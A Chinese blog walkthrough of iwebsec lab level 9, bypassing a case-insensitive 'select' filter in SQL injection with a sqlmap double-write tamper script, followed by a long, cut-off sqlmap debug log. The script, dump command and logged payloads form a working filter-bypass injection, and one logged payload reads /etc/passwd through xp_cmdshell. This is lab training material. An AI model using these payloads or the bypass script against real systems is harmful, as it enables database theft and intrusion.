系列文章目录
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入(报错型盲注)_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记6- 宽字节注入_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记7- 空格过滤绕过_mooyuan的博客-CSDN博客
iwebsec靶场 SQL注入漏洞通关笔记8- 大小写过滤注入_mooyuan的博客-CSDN博客
目录
系列文章目录
前言
一、源码分析
二、sqlmap注入
1.双写绕过脚本
2.注入命令
2.完整交互
总结
前言
打开靶场第09关,http://192.168.71.151/sqli/09.php?id=1
如下所示
一、源码分析
如下所示,SQL语句与前几关一样,调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入,并且对参数id做了关键字select的过滤,且与第08关不同的是此关卡的大小写敏感也被加上,即只要出现select无论大小写均会被过滤。
不区分大小写的select关键字过滤的相关源码如下所示
$id=preg_replace('/select/i','', $_GET["id"]);既然无法使用大小写绕过,那么可以通过双写法seselectlect法绕过。
二、sqlmap注入
1.双写绕过脚本
源码如下,功能为将select替换为seselectlect,这样服务器的源码过滤时就可以绕过select关键字的过滤
脚本如下:
#!/usr/bin/env python
'''
sqlmap 双写绕过
by:ljn
'''
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
payload= payload.lower()
payload= payload.replace('select' , 'seselectlect')
retVal=payload
return retVal并将其命名为double_ljn09.py放入到sqlmap下的tamper文件夹中
kali sqlmap的绕过脚本在目录/usr/share/sqlmap/tamper/下,故而需要将double_ljn09.py放入其中。
2.注入命令
使用sqlmap的绕waf脚本double_ljn09.py,将seselectlect替换select
sqlmap -u http://192.168.71.151/sqli/09.php?id=1 --current-db --dump --batch --tamper double_ljn09.py如下所示渗透成功
2.完整交互
为展示双写替换成功,将加上调试参数-v3的交互过程完整给出
kali@kali:/usr/share/sqlmap/tamper$ sqlmap -u http://192.168.71.151/sqli/09.php?id=1 --current-db --dump --batch --tamper double_ljn09.py -v3
___
__H__
___ ___["]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:58:35 /2022-11-25/
[00:58:35] [DEBUG] cleaning up configuration parameters
[00:58:35] [INFO] loading tamper module 'double_ljn09'
[00:58:35] [DEBUG] setting the HTTP timeout
[00:58:35] [DEBUG] setting the HTTP User-Agent header
[00:58:35] [DEBUG] creating HTTP requests opener object
[00:58:35] [INFO] testing connection to the target URL
[00:58:35] [DEBUG] declared web page charset 'utf-8'
[00:58:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:58:35] [PAYLOAD] 6289 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[00:58:35] [INFO] testing if the target URL content is stable
[00:58:36] [INFO] target URL content is stable
[00:58:36] [INFO] testing if GET parameter 'id' is dynamic
[00:58:36] [PAYLOAD] 9571
[00:58:36] [WARNING] GET parameter 'id' does not appear to be dynamic
[00:58:36] [PAYLOAD] 1."(,(.()'.
[00:58:36] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[00:58:36] [PAYLOAD] 1'pgerqe<'">szrojq
[00:58:36] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[00:58:36] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[00:58:36] [DEBUG] used the default behavior, running in batch mode
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:58:36] [DEBUG] used the default behavior, running in batch mode
[00:58:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:58:36] [PAYLOAD] 1
[00:58:36] [PAYLOAD] 1) and 1435=8013 and (2142=2142
[00:58:36] [WARNING] reflective value(s) found and filtering out
[00:58:36] [PAYLOAD] 1) and 5700=5700 and (6511=6511
[00:58:36] [PAYLOAD] 1 and 1174=6236
[00:58:36] [PAYLOAD] 1 and 5700=5700
[00:58:36] [PAYLOAD] 1 and 1006=7104
[00:58:36] [PAYLOAD] 1 and 2702=1601-- lyzi
[00:58:36] [PAYLOAD] 1 and 5700=5700-- epui
[00:58:36] [PAYLOAD] 1 and 3207=3625-- uvps
[00:58:36] [PAYLOAD] 1') and 9182=7772 and ('faie'='faie
[00:58:36] [PAYLOAD] 1') and 5700=5700 and ('mxmb'='mxmb
[00:58:36] [PAYLOAD] 1' and 8745=6902 and 'xgvj'='xgvj
[00:58:36] [PAYLOAD] 1' and 5700=5700 and 'kpfm'='kpfm
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the risk (3) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT)' because the risk (3) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the level (2) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the risk (3) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (comment)' because the level (2) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (comment)' because the risk (3) is higher than the provided (1)
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' because the risk (3) is higher than the provided (1)
[00:58:36] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:58:36] [PAYLOAD] (seselectlect (case when (7325=8598) then 1 else (seselectlect 8598 union seselectlect 5468) end))
[00:58:36] [DEBUG] setting match ratio for current parameter to 0.970
[00:58:36] [PAYLOAD] (seselectlect (case when (7615=7615) then 1 else (seselectlect 3806 union seselectlect 2800) end))
[00:58:36] [PAYLOAD] (seselectlect (case when (9150=3139) then 1 else (seselectlect 3139 union seselectlect 6796) end))
[00:58:36] [INFO] GET parameter 'id' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="age")
[00:58:36] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL - original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE - original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'HAVING boolean-based blind - WHERE, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:36] [INFO] testing 'Generic inline queries'
[00:58:36] [PAYLOAD] (seselectlect concat(concat(0x716a6a6271,(case when (7479=7479) then 0x31 else 0x30 end)),0x717a787671))
[00:58:36] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:58:36] [PAYLOAD] 1 and (seselectlect 2*(if((seselectlect * from (seselectlect concat(0x716a6a6271,(seselectlect (elt(8411=8411,1))),0x717a787671,0x78))s), 8446744073709551610, 8446744073709551610)))
[00:58:36] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:58:36] [PAYLOAD] 1 or (seselectlect 2*(if((seselectlect * from (seselectlect concat(0x716a6a6271,(seselectlect (elt(3672=3672,1))),0x717a787671,0x78))s), 8446744073709551610, 8446744073709551610)))
[00:58:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:58:36] [PAYLOAD] 1 and exp(~(seselectlect * from (seselectlect concat(0x716a6a6271,(seselectlect (elt(3784=3784,1))),0x717a787671,0x78))x))
[00:58:36] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:58:36] [PAYLOAD] 1 or exp(~(seselectlect * from (seselectlect concat(0x716a6a6271,(seselectlect (elt(9567=9567,1))),0x717a787671,0x78))x))
[00:58:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[00:58:36] [PAYLOAD] 1 and gtid_subset(concat(0x716a6a6271,(seselectlect (elt(8464=8464,1))),0x717a787671),8464)
[00:58:36] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[00:58:36] [PAYLOAD] 1 or gtid_subset(concat(0x716a6a6271,(seselectlect (elt(3535=3535,1))),0x717a787671),3535)
[00:58:36] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:58:36] [PAYLOAD] 1 and json_keys((seselectlect convert((seselectlect concat(0x716a6a6271,(seselectlect (elt(7523=7523,1))),0x717a787671)) using utf8)))
[00:58:36] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:58:36] [PAYLOAD] 1 or json_keys((seselectlect convert((seselectlect concat(0x716a6a6271,(seselectlect (elt(3801=3801,1))),0x717a787671)) using utf8)))
[00:58:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:58:36] [PAYLOAD] 1 and (seselectlect 7705 from(seselectlect count(*),concat(0x716a6a6271,(seselectlect (elt(7705=7705,1))),0x717a787671,floor(rand(0)*2))x from information_schema.plugins group by x)a)
[00:58:36] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (EXP)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:58:36] [DEBUG] skipping test 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:58:36] [INFO] testing 'MySQL inline queries'
[00:58:36] [PAYLOAD] (seselectlect concat(0x716a6a6271,(elt(3701=3701,1)),0x717a787671))
[00:58:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[00:58:36] [PAYLOAD] >= 5.0
[00:58:36] [PAYLOAD] 1;seselectlect sleep(5)#
[00:58:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[00:58:36] [PAYLOAD] 1;seselectlect sleep(5)
[00:58:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[00:58:36] [PAYLOAD] 1;(seselectlect * from (seselectlect(sleep(5)))yjia)#
[00:58:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[00:58:36] [PAYLOAD] 1;(seselectlect * from (seselectlect(sleep(5)))vkls)
[00:58:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[00:58:36] [PAYLOAD] 1;seselectlect benchmark(5000000,md5(0x4e434656))#
[00:58:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:58:36] [PAYLOAD] 1;seselectlect benchmark(5000000,md5(0x524d674e))
[00:58:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[00:58:36] [PAYLOAD] 1 and (seselectlect 5392 from (seselectlect(sleep(5)))uzrb)
[00:58:41] [PAYLOAD] 1 and (seselectlect 5392 from (seselectlect(sleep(0)))uzrb)
[00:58:41] [PAYLOAD] 1 and (seselectlect 5392 from (seselectlect(sleep(5)))uzrb)
[00:58:46] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL AND time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL OR time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL AND time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL OR time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (bool)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (ELT)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (MAKE_SET)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'IBM DB2 boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[00:58:46] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
